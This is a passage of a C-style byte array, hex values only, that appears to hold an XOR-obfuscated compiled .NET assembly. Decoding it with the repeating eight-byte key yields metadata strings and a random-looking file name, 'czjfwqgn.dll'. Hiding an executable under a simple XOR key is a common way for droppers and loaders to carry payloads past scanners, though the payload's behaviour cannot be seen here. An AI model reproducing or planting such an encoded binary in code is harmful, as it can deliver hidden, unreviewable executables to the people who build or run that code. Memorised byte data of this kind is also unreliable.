0x58, 0x17, 0xDA, 0xBB, 0xB6, 0xC1, 0x23, 0xFB, 0x5E,\n\t0x0E, 0x9D, 0x86, 0xBD, 0x89, 0x0E, 0xED, 0x4E, 0x1F, 0x99, 0x8B, 0xBF, 0xDE, 0x63, 0xBE, 0x50,\n\t0x09, 0x97, 0x86, 0xA1, 0xCB, 0x26, 0xFC, 0x11, 0x5A, 0xA2, 0x8C, 0xA1, 0xD4, 0x26, 0xF1, 0x53,\n\t0x47, 0xC6, 0xC7, 0xE3, 0x89, 0x7F, 0xB0, 0x0D, 0x56, 0xD4, 0xAA, 0xA6, 0xCB, 0x3B, 0xEB, 0x4F,\n\t0x1F, 0xC9, 0x87, 0xB6, 0xD2, 0x3B, 0xEC, 0x5C, 0x16, 0xD8, 0xC9, 0x83, 0xD2, 0x2D, 0xF2, 0x54,\n\t0x19, 0xBF, 0x8C, 0xAA, 0xF3, 0x20, 0xF5, 0x58, 0x14, 0xC9, 0x8B, 0xE4, 0x90, 0x2E, 0xAB, 0x5E,\n\t0x4F, 0xC2, 0xD8, 0xEA, 0x94, 0x7B, 0xFB, 0x0D, 0x42, 0xCD, 0xB4, 0x8E, 0xAE, 0x55, 0x9E, 0x3D,\n\t0x7A, 0xFE, 0xE0, 0xFD, 0xA7, 0x4F, 0x9E, 0x3B, 0x3A, 0xF4, 0xE9, 0xD3, 0xBD, 0x1C, 0xE7, 0x4E,\n\t0x0E, 0x91, 0x84, 0xFD, 0xF5, 0x2A, 0xF8, 0x51, 0x1F, 0x97, 0x9D, 0xBA, 0xC8, 0x21, 0xB0, 0x7C,\n\t0x09, 0x87, 0x8C, 0xBE, 0xC5, 0x23, 0xE7, 0x3B, 0x3B, 0xF4, 0xE9, 0xD3, 0xA3, 0x03, 0xF1, 0x5C,\n\t0x1E, 0xFE, 0xED, 0xE6, 0xA7, 0x4F, 0x9E, 0x12, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x6F,\n\t0x1F, 0x92, 0x85, 0xB6, 0xC4, 0x3B, 0xF7, 0x52, 0x14, 0xDA, 0xA4, 0xB6, 0xCA, 0x2D, 0xFB, 0x4F,\n\t0x33, 0x9A, 0x8F, 0xBC, 0xF4, 0x2A, 0xEC, 0x54, 0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52,\n\t0x14, 0xBC, 0x86, 0xBF, 0xC3, 0x2A, 0xEC, 0x3B, 0x7A, 0xF4, 0xE9, 0xD7, 0xE9, 0x2E, 0xF3, 0x58,\n\t0x76, 0xB5, 0x9A, 0xA0, 0xC2, 0x22, 0xFC, 0x51, 0x03, 0xBA, 0x88, 0xBE, 0xC2, 0x46, 0xDD, 0x51,\n\t0x1B, 0x87, 0x9A, 0x9D, 0xC6, 0x22, 0xFB, 0x34, 0x29, 0x9D, 0x8E, 0xBD, 0xC6, 0x3B, 0xEB, 0x4F,\n\t0x1F, 0xFE, 0xA4, 0xB6, 0xCA, 0x2D, 0xFB, 0x4F, 0x2E, 0x8D, 0x99, 0xB6, 0xB7, 0x08, 0xFB, 0x53,\n\t0x1F, 0x86, 0x80, 0xB0, 0xE6, 0x3D, 0xF9, 0x48, 0x17, 0x91, 0x87, 0xA7, 0xD4, 0x4E, 0x9F, 0x3C,\n\t0x7B, 0xF4, 0xEA, 0xDB, 0xAA, 0x1C, 0xE7, 0x4E, 0x0E, 0x91, 0x84, 0xFD, 0xF3, 0x36, 0xEE, 0x58,\n\t0x21, 0xA9, 0xE0, 0x92, 0xA7, 0x4F, 0x9E, 0x34, 0x54, 0xF4, 0xE9, 0xD3, 0xAE, 0x0F, 0x9E, 0x3D,\n\t0x7A, 0xF2, 0xAD, 0xD3, 0xA7, 0x4F, 0xB9, 0x6E, 0x03, 0x87, 
0x9D, 0xB6, 0xCA, 0x61, 0xCC, 0x58,\n\t0x1C, 0x98, 0x8C, 0xB0, 0xD3, 0x26, 0xF1, 0x53, 0x54, 0xB5, 0x9A, 0xA0, 0xC2, 0x22, 0xFC, 0x51,\n\t0x03, 0xD4, 0xA5, 0xBC, 0xC6, 0x2B, 0xB6, 0x7F, 0x03, 0x80, 0x8C, 0x88, 0xFA, 0x66, 0x96, 0x3D,\n\t0x7A, 0xF4, 0xE3, 0xD2, 0x91, 0x4F, 0x9E, 0x3D, 0x4E, 0xF4, 0xE9, 0xD3, 0xA1, 0x0A, 0x9E, 0x3D,\n\t0x7A, 0x38, 0xEB, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xAF, 0xA6, 0xC9, 0x2C, 0xFE, 0x0F,\n\t0x21, 0xAF, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xA6, 0x8C, 0xB5, 0xCB, 0x2A, 0xFD, 0x49,\n\t0x13, 0x9B, 0x87, 0xFD, 0xE6, 0x3C, 0xED, 0x58, 0x17, 0x96, 0x85, 0xAA, 0x8B, 0x6F, 0xF3, 0x4E,\n\t0x19, 0x9B, 0x9B, 0xBF, 0xCE, 0x2D, 0xB2, 0x1D, 0x2C, 0x91, 0x9B, 0xA0, 0xCE, 0x20, 0xF0, 0x00,\n\t0x48, 0xDA, 0xD9, 0xFD, 0x97, 0x61, 0xAE, 0x11, 0x5A, 0xB7, 0x9C, 0xBF, 0xD3, 0x3A, 0xEC, 0x58,\n\t0x47, 0x9A, 0x8C, 0xA6, 0xD3, 0x3D, 0xFF, 0x51, 0x56, 0xD4, 0xB9, 0xA6, 0xC5, 0x23, 0xF7, 0x5E,\n\t0x31, 0x91, 0x90, 0x87, 0xC8, 0x24, 0xFB, 0x53, 0x47, 0x96, 0xDE, 0xE4, 0xC6, 0x7A, 0xFD, 0x08,\n\t0x4C, 0xC5, 0xD0, 0xE0, 0x93, 0x2A, 0xAE, 0x05, 0x43, 0xA9, 0xC5, 0x88, 0xF4, 0x36, 0xED, 0x49,\n\t0x1F, 0x99, 0xC7, 0x90, 0xC8, 0x23, 0xF2, 0x58, 0x19, 0x80, 0x80, 0xBC, 0xC9, 0x3C, 0xB0, 0x7A,\n\t0x1F, 0x9A, 0x8C, 0xA1, 0xCE, 0x2C, 0xB0, 0x74, 0x3F, 0x9A, 0x9C, 0xBE, 0xC2, 0x3D, 0xFF, 0x5F,\n\t0x16, 0x91, 0x89, 0xE2, 0xFC, 0x14, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x1B, 0xE7, 0x4D,\n\t0x1F, 0xD8, 0xC9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F, 0x16, 0x9D, 0x8B, 0xFF, 0x87, 0x19, 0xFB, 0x4F,\n\t0x09, 0x9D, 0x86, 0xBD, 0x9A, 0x7D, 0xB0, 0x0D, 0x54, 0xC4, 0xC7, 0xE3, 0x8B, 0x6F, 0xDD, 0x48,\n\t0x16, 0x80, 0x9C, 0xA1, 0xC2, 0x72, 0xF0, 0x58, 0x0F, 0x80, 0x9B, 0xB2, 0xCB, 0x63, 0xBE, 0x6D,\n\t0x0F, 0x96, 0x85, 0xBA, 0xC4, 0x04, 0xFB, 0x44, 0x2E, 0x9B, 0x82, 0xB6, 0xC9, 0x72, 0xFC, 0x0A,\n\t0x4D, 0x95, 0xDC, 0xB0, 0x92, 0x79, 0xAF, 0x04, 0x49, 0xC0, 0x8C, 0xE3, 0x9F, 0x76, 0xC3, 0x60,\n\t0x56, 0xD4, 0x84, 0xA0, 0xC4, 0x20, 0xEC, 0x51, 0x13, 0x96, 0xC5, 0xF3, 0xF1, 
0x2A, 0xEC, 0x4E,\n\t0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51,\n\t0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48,\n\t0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A,\n\t0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x12, 0xC3, 0x34,\n\t0x60, 0xF4, 0xE9, 0xD3, 0xAD, 0x46, 0xB0, 0x3D, 0x7A, 0xF4, 0xE0, 0x93, 0xA7, 0x4F, 0x9E, 0x3B,\n\t0x33, 0xF4, 0xE9, 0xD3, 0xAF, 0x08, 0xFB, 0x49, 0x2E, 0x8D, 0x99, 0xB6, 0xD4, 0x45, 0x9F, 0x0A,\n\t0x7A, 0xF4, 0xE9, 0xE6, 0xA7, 0x4F, 0x9E, 0x34, 0x33, 0xF4, 0xE9, 0xD3, 0xAE, 0x61, 0x9E, 0x3D,\n\t0x7A, 0xFD, 0xA9, 0xD3, 0xA7, 0x4F, 0x98, 0x71, 0x7A, 0xF4, 0xE9, 0xCB, 0xF4, 0x36, 0xED, 0x49,\n\t0x1F, 0x99, 0xC7, 0x87, 0xDE, 0x3F, 0xFB, 0x66, 0x27, 0xD4, 0xAE, 0xB6, 0xD3, 0x1B, 0xE7, 0x4D,\n\t0x1F, 0x87, 0xC1, 0xFA, 0xAF, 0x4F, 0x9E, 0x3D, 0x70, 0xF5, 0xD1, 0xD3, 0xA7, 0x4F, 0xAA, 0x3D,\n\t0x7A, 0xF4, 0xEF, 0x9E, 0xA7, 0x4F, 0x9E, 0xFB, 0x7B, 0xA7, 0x90, 0xA0, 0xD3, 0x2A, 0xF3, 0x13,\n\t0x3C, 0x81, 0x87, 0xB0, 0xC7, 0x7D, 0xC5, 0x66, 0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x69,\n\t0x03, 0x84, 0x8C, 0xFF, 0x87, 0x22, 0xED, 0x5E, 0x15, 0x86, 0x85, 0xBA, 0xC5, 0x63, 0xBE, 0x6B,\n\t0x1F, 0x86, 0x9A, 0xBA, 0xC8, 0x21, 0xA3, 0x0F, 0x54, 0xC4, 0xC7, 0xE3, 0x89, 0x7F, 0xB2, 0x1D,\n\t0x39, 0x81, 0x85, 0xA7, 0xD2, 0x3D, 0xFB, 0x00, 0x14, 0x91, 0x9C, 0xA7, 0xD5, 0x2E, 0xF2, 0x11,\n\t0x5A, 0xA4, 0x9C, 0xB1, 0xCB, 0x26, 0xFD, 0x76, 0x1F, 0x8D, 0xBD, 0xBC, 0xCC, 0x2A, 0xF0, 0x00,\n\t0x18, 0xC3, 0xDE, 0xB2, 0x92, 0x2C, 0xAB, 0x0B, 0x4B, 0xCD, 0xDA, 0xE7, 0xC2, 0x7F, 0xA6, 0x04,\n\t0x27, 0xD8, 0xB2, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49,\n\t0x56, 0xD4, 0x84, 0xA0, 0xC4, 0x20, 0xEC, 0x51, 0x13, 0x96, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E,\n\t0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13, 0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 
0x51,\n\t0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48, 0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48,\n\t0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69, 0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A,\n\t0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E, 0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x12, 0xC3, 0x34,\n\t0x60, 0xF4, 0xE9, 0xD3, 0xAD, 0x46, 0xB0, 0x3D, 0x7A, 0xF4, 0xEF, 0x83, 0xA7, 0x4F, 0x9E, 0x2D,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x7C, 0x19, 0x80, 0x80, 0xA5, 0xC6, 0x3B, 0xF1, 0x4F,\n\t0x7C, 0xA5, 0xE9, 0xD3, 0xA7, 0x41, 0xDD, 0x4F, 0x1F, 0x95, 0x9D, 0xB6, 0xEE, 0x21, 0xED, 0x49,\n\t0x1B, 0x9A, 0x8A, 0xB6, 0xAD, 0x4E, 0xA7, 0x3D, 0x7A, 0xF4, 0xDC, 0xD3, 0xA7, 0x4F, 0x97, 0x6C,\n\t0x7A, 0xF4, 0xE9, 0xDA, 0x89, 0x4F, 0x9E, 0x3D, 0x73, 0xA4, 0xE9, 0xD3, 0xA7, 0x49, 0xCA, 0x3D,\n\t0x7A, 0xF4, 0xC0, 0x80, 0xDE, 0x3C, 0xEA, 0x58, 0x17, 0xDA, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49,\n\t0x5A, 0xB7, 0x9B, 0xB6, 0xC6, 0x3B, 0xFB, 0x74, 0x14, 0x87, 0x9D, 0xB2, 0xC9, 0x2C, 0xFB, 0x15,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x69, 0x03, 0x84, 0x8C, 0xFA, 0xAF, 0x4F, 0x9E, 0x3D,\n\t0x70, 0xF5, 0xD3, 0xD3, 0xA7, 0x4F, 0x95, 0x3D, 0x7A, 0xF4, 0xEF, 0x86, 0xA7, 0x4F, 0x9E, 0x1B,\n\t0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x7E, 0x15, 0x99, 0x99, 0xBC, 0xC9, 0x2A, 0xF0, 0x49,\n\t0x37, 0x9B, 0x8D, 0xB6, 0xCB, 0x61, 0xDA, 0x58, 0x09, 0x9D, 0x8E, 0xBD, 0x89, 0x0C, 0xF1, 0x50,\n\t0x17, 0x95, 0x87, 0xB7, 0xEE, 0x0B, 0x9A, 0x3D, 0x7A, 0xF4, 0xE0, 0xF9, 0xA7, 0x4F, 0x9E, 0x2D,\n\t0x41, 0xF4, 0xE9, 0xD3, 0xA5, 0x4F, 0x9E, 0x3D, 0x73, 0xA3, 0xE9, 0xD3, 0xA7, 0x47, 0x96, 0x3D,\n\t0x5A, 0xF4, 0xE9, 0xDC, 0x9B, 0x4F, 0x9E, 0x3D, 0x7A, 0xF8, 0xE9, 0xD3, 0xA5, 0x02, 0xC4, 0xAD,\n\t0x7A, 0xF7, 0xE9, 0xD3, 0xA7, 0x4B, 0x9E, 0x3D, 0x7A, 0x0B, 0x16, 0xD3, 0xA7, 0xF7, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x0F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 
0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0x74, 0xE9, 0xD3, 0xA7, 0x41, 0x81, 0x87,\n\t0x74, 0xF4, 0x5D, 0xDA, 0x6A, 0x6E, 0x26, 0x3C, 0x36, 0x39, 0xC8, 0x87, 0xCF, 0x26, 0xED, 0x1D,\n\t0x0A, 0x86, 0x86, 0xB4, 0xD5, 0x2E, 0xF3, 0x1D, 0x19, 0x95, 0x87, 0xBD, 0xC8, 0x3B, 0xBE, 0x5F,\n\t0x1F, 0xD4, 0x9B, 0xA6, 0xC9, 0x6F, 0xF7, 0x53, 0x5A, 0xB0, 0xA6, 0x80, 0x87, 0x22, 0xF1, 0x59,\n\t0x1F, 0xDA, 0xE4, 0xDE, 0xAD, 0x6B, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x1F, 0xDB, 0x3D,\n\t0x7A, 0xB8, 0xE8, 0xD0, 0xA7, 0xDF, 0xFD, 0x56, 0x18, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0x14, 0xE9, 0xD1, 0x86, 0x44, 0x9F, 0x35, 0x7A, 0xF4, 0xED, 0xD3, 0xA7, 0x4F, 0x98, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0xE1, 0xBD, 0x3D, 0x7A, 0xF4, 0xC9, 0xD3, 0xA7, 0x4F, 0xDE, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0x93, 0xA7, 0x4F, 0xBE, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA7, 0x4B, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4B, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x1E, 0x3D,\n\t0x7A, 0xF4, 0xEB, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF7, 0xE9, 0x93, 0x22, 0x4F, 0x9E, 0x2D,\n\t0x7A, 0xF4, 0xF9, 0xD3, 0xA7, 0x4F, 0x9E, 0x2D, 0x7A, 0xF4, 0xF9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xE4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x2F, 0xBD, 0x3D,\n\t0x7A, 0xBF, 0xE9, 0xD3, 0xA7, 0x4F, 0xDE, 0x3D, 0x7A, 0x5C, 0xEB, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0xFE, 0x3D,\n\t0x7A, 0xF8, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0xBE, 0x3D, 0x7A, 0xFC, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x47, 0xBE, 0x3D, 0x7A, 0xBC, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 
0xA7, 0x61, 0xEA, 0x58, 0x02, 0x80, 0xE9, 0xD3, 0xA7, 0xFB, 0x9D, 0x3D,\n\t0x7A, 0xF4, 0xC9, 0xD3, 0xA7, 0x4F, 0x9A, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xD4, 0xE9, 0xD3, 0xC7, 0x61, 0xEC, 0x4E,\n\t0x08, 0x97, 0xE9, 0xD3, 0xA7, 0xE7, 0x9C, 0x3D, 0x7A, 0xF4, 0xA9, 0xD3, 0xA7, 0x4F, 0x9A, 0x3D,\n\t0x7A, 0xF4, 0xEF, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xB4, 0xE9, 0xD3, 0xE7, 0x61, 0xEC, 0x58, 0x16, 0x9B, 0x8A, 0xD3, 0xA7, 0x43, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0x89, 0xD3, 0xA7, 0x4F, 0x9C, 0x3D, 0x7A, 0xF4, 0xE3, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xB4, 0xE9, 0xD3, 0xE5, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0xDF, 0xBD, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x07, 0x9E, 0x3D, 0x7A, 0xF6, 0xE9, 0xD6, 0xA7, 0x37, 0xBE, 0x3D,\n\t0x7A, 0x1C, 0xEB, 0xD3, 0xA7, 0x4E, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0xD5, 0x9C, 0x15,\n\t0x79, 0xF4, 0xE9, 0xD9, 0xD5, 0x4E, 0x9E, 0x3D, 0x0A, 0x86, 0xE0, 0xD3, 0xA7, 0x3F, 0xEC, 0x2C,\n\t0x7A, 0xF4, 0x99, 0xFB, 0xA3, 0x4F, 0x9E, 0x37, 0x52, 0xF1, 0xE9, 0xD3, 0xAD, 0x67, 0x98, 0x3D,\n\t0x7A, 0xFE, 0xCF, 0xF9, 0xA7, 0x0D, 0xCD, 0x77, 0x38, 0xF5, 0xE9, 0xD2, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF8, 0xE9, 0xD3, 0xA7, 0x39, 0xAC, 0x13, 0x4A, 0xDA, 0xDC, 0xE3, 0x90, 0x7D, 0xA9, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD6, 0xA7, 0x23, 0x9E, 0x3D, 0x7A, 0xF4, 0xE8, 0xD3, 0xA7, 0x6C, 0xE0, 0x3D,\n\t0x7A, 0x98, 0xE8, 0xD3, 0xA7, 0xB3, 0x9E, 0x3D, 0x7A, 0xD7, 0xBA, 0xA7, 0xD5, 0x26, 0xF0, 0x5A,\n\t0x09, 0xF4, 0xE9, 0xD3, 0xA7, 0x27, 0x9C, 
0x3D, 0x7A, 0xD4, 0xE9, 0xD3, 0xA7, 0x6C, 0xCB, 0x6E,\n\t0x7A, 0x7C, 0xEB, 0xD3, 0xA7, 0x5F, 0x9E, 0x3D, 0x7A, 0xD7, 0xAE, 0x86, 0xEE, 0x0B, 0x9E, 0x3D,\n\t0x7A, 0x6C, 0xEB, 0xD3, 0xA7, 0x1F, 0x9E, 0x3D, 0x7A, 0xD7, 0xAB, 0xBF, 0xC8, 0x2D, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4D, 0x9E, 0x3D, 0x7B, 0xB3, 0xFD, 0xD3, 0xA7, 0x46, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0x13, 0xD2, 0x94, 0x4F, 0x88, 0x3D, 0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x49, 0x9E, 0x3D,\n\t0x7A, 0xF6, 0xE9, 0xD3, 0xA7, 0x4E, 0x9E, 0x3D, 0x7A, 0xF2, 0xE9, 0xD3, 0xA7, 0x4D, 0x9E, 0x3D,\n\t0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x4D, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD9, 0xA7, 0x4E, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD5, 0xA7, 0x7B, 0x9E, 0x10, 0x7A, 0xF2, 0xE9, 0xB2, 0xA7, 0x0E, 0x9E, 0x3B,\n\t0x7A, 0x75, 0xE9, 0x92, 0xA7, 0x49, 0x9E, 0x95, 0x7A, 0xD9, 0xE9, 0xD5, 0xA7, 0x84, 0x9E, 0x10,\n\t0x7A, 0xFE, 0xE9, 0x3F, 0xA7, 0x96, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD2, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF5, 0xE9, 0xD2, 0xA7, 0x4F, 0x9E, 0x2D, 0x7A, 0xE3, 0xE9, 0xD3, 0xA7, 0x4A, 0x9E, 0x3C,\n\t0x7A, 0xF5, 0xE9, 0x83, 0x87, 0x4F, 0x9E, 0x3D, 0x7A, 0x72, 0xF1, 0xE8, 0xA7, 0x45, 0x9E, 0x3C,\n\t0x7A, 0xE5, 0xE9, 0xE8, 0xA7, 0x41, 0x9E, 0x24, 0x7A, 0xCF, 0xE9, 0xD9, 0xA7, 0x46, 0x9E, 0x06,\n\t0x7A, 0xFE, 0xE9, 0xF2, 0xA7, 0xFB, 0x9E, 0x2E, 0x7A, 0xDD, 0xE9, 0x01, 0xA7, 0x57, 0x9E, 0x0C,\n\t0x7A, 0x00, 0xE9, 0xCD, 0xA7, 0x61, 0x9E, 0x36, 0x7A, 0xD1, 0xE9, 0xFD, 0xA7, 0x5C, 0x9E, 0x13,\n\t0x7A, 0xF0, 0x69, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0x4C, 0xA7, 0x4F, 0x9E, 0x3F, 0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD2, 0xA7, 0x6B, 0x9E, 0x3D, 0x7A, 0xF4, 0xE9, 0xD1, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3C, 0x7A, 0xD9, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,\n\t0x7A, 0xF4, 0xD5, 0x9E, 0xC8, 0x2B, 0xEB, 0x51, 0x1F, 0xCA, 0xE9, 0xB0, 0xDD, 0x25, 0xF8, 0x4A,\n\t0x0B, 0x93, 0x87, 0xFD, 0xC3, 0x23, 0xF2, 0x3D, 0x3F, 0x8C, 
0x99, 0xBF, 0xC8, 0x26, 0xEA, 0x7E,\n\t0x16, 0x95, 0x9A, 0xA0, 0xA7, 0x22, 0xED, 0x5E, 0x15, 0x86, 0x85, 0xBA, 0xC5, 0x4F, 0xCD, 0x44,\n\t0x09, 0x80, 0x8C, 0xBE, 0xA7, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0xD3, 0x89, 0x2C, 0xEA, 0x52,\n\t0x08, 0xF4, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xA6, 0x9C, 0xBD, 0xD3, 0x26, 0xF3, 0x58,\n\t0x54, 0xB7, 0x86, 0xBE, 0xD7, 0x26, 0xF2, 0x58, 0x08, 0xA7, 0x8C, 0xA1, 0xD1, 0x26, 0xFD, 0x58,\n\t0x09, 0xF4, 0xAA, 0xBC, 0xCA, 0x3F, 0xF7, 0x51, 0x1B, 0x80, 0x80, 0xBC, 0xC9, 0x1D, 0xFB, 0x51,\n\t0x1B, 0x8C, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x4E, 0x3B, 0x80, 0x9D, 0xA1, 0xCE, 0x2D, 0xEB, 0x49,\n\t0x1F, 0xF4, 0xBB, 0xA6, 0xC9, 0x3B, 0xF7, 0x50, 0x1F, 0xB7, 0x86, 0xBE, 0xD7, 0x2E, 0xEA, 0x54,\n\t0x18, 0x9D, 0x85, 0xBA, 0xD3, 0x36, 0xDF, 0x49, 0x0E, 0x86, 0x80, 0xB1, 0xD2, 0x3B, 0xFB, 0x3D,\n\t0x19, 0x8E, 0x83, 0xB5, 0xD0, 0x3E, 0xF9, 0x53, 0x7A, 0xB1, 0x87, 0xA5, 0xCE, 0x3D, 0xF1, 0x53,\n\t0x17, 0x91, 0x87, 0xA7, 0xA7, 0x08, 0xFB, 0x49, 0x3F, 0x9A, 0x9F, 0xBA, 0xD5, 0x20, 0xF0, 0x50,\n\t0x1F, 0x9A, 0x9D, 0x85, 0xC6, 0x3D, 0xF7, 0x5C, 0x18, 0x98, 0x8C, 0xD3, 0xF4, 0x3B, 0xEC, 0x54,\n\t0x14, 0x93, 0xE9, 0x90, 0xC8, 0x21, 0xFD, 0x5C, 0x0E, 0xF4, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50,\n\t0x54, 0xB0, 0x80, 0xB2, 0xC0, 0x21, 0xF1, 0x4E, 0x0E, 0x9D, 0x8A, 0xA0, 0xA7, 0x1F, 0xEC, 0x52,\n\t0x19, 0x91, 0x9A, 0xA0, 0xA7, 0x1C, 0xEA, 0x5C, 0x08, 0x80, 0xE9, 0xD3, 0xA7, 0x4F, 0x99, 0x5E,\n\t0x7A, 0x99, 0xE9, 0xB7, 0xA7, 0x4F, 0x99, 0x12, 0x7A, 0x97, 0xE9, 0xF3, 0xA7, 0x4F, 0x95, 0x4D,\n\t0x7A, 0x91, 0xE9, 0xE0, 0xA7, 